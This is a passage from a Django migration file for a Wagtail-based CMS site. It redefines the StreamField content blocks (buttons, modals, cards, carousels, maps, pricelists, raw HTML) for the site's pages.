('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))])), ('carousel', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('carousel', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.Carousel'))])), ('modal', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), 
('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('header', wagtail.core.blocks.CharBlock(label='Modal heading', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 
'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking 
Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 
'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', 
wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 
1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. 
Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), 
('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', 
wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), 
('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom 
CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], blank=True, null=True),
),
migrations.AlterField(
model_name='genericpage',
name='body',
field=wagtail.core.fields.StreamField([('hero', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(default=True, label='Full width', required=False)), ('is_parallax', wagtail.core.blocks.BooleanBlock(help_text='Background images scroll slower than foreground images, creating an illusion of depth.', label='Parallax Effect', required=False)), ('background_image', wagtail.images.blocks.ImageChooserBlock(required=False)), ('tile_image', wagtail.core.blocks.BooleanBlock(default=False, label='Tile background image', required=False)), ('background_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. #ff0011)', label='Background color', max_length=255, required=False)), ('foreground_color', wagtail.core.blocks.CharBlock(help_text='Hexadecimal, rgba, or CSS color notation (e.g. 
#ff0011)', label='Text color', max_length=255, required=False)), ('content', wagtail.core.blocks.StreamBlock([('row', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('column_breakpoint', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Always expanded'), ('sm', 'sm - Expand on small screens (phone, 576px) and larger'), ('md', 'md - Expand on medium screens (tablet, 768px) and larger'), ('lg', 'lg - Expand on large screens (laptop, 992px) and larger'), ('xl', 'xl - Expand on extra large screens (wide monitor, 1200px)')], help_text='Screen size at which the column will expand horizontally or stack vertically.', required=False, verbose_name='Column Breakpoint'))])), ('column_size', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Automatically size'), ('12', 'Full row'), ('6', 'Half - 1/2 column'), ('4', 'Thirds - 1/3 column'), ('8', 'Thirds - 2/3 column'), ('3', 'Quarters - 1/4 column'), ('9', 'Quarters - 3/4 column'), ('2', 'Sixths - 1/6 column'), ('10', 'Sixths - 5/6 column'), ('1', 'Twelfths - 1/12 column'), ('5', 'Twelfths - 5/12 column'), ('7', 'Twelfths - 7/12 column'), ('11', 
'Twelfths - 11/12 column')], label='Column size', required=False)), ('content', wagtail.core.blocks.StreamBlock([('header', wagtail.core.blocks.StructBlock([('header', wagtail.core.blocks.ChoiceBlock(choices=[('h1', 'H1'), ('h2', 'H2'), ('h3', 'H3'), ('h4', 'H4'), ('h5', 'H5'), ('h6', 'H6')], label='Header Size')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=50))])), ('text', coderedcms.blocks.html_blocks.RichTextBlock(icon='fa-file-text-o')), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), 
('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))])), ('image', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image'))])), ('image_text_overlay', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('text', wagtail.core.blocks.CharBlock(label='Text', max_length=200))])), ('image_link', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), 
('image', wagtail.images.blocks.ImageChooserBlock(label='Image')), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Alternate text to show if the image doesn’t load', max_length=255, required=True))])), ('list', wagtail.core.blocks.StructBlock([('content', wagtail.core.blocks.ListBlock(wagtail.core.blocks.CharBlock(), label='Items'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML')), ('accordions', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=50)), ('content', wagtail.core.blocks.RichTextBlock(label='Content'))])), ('download', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), 
('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', 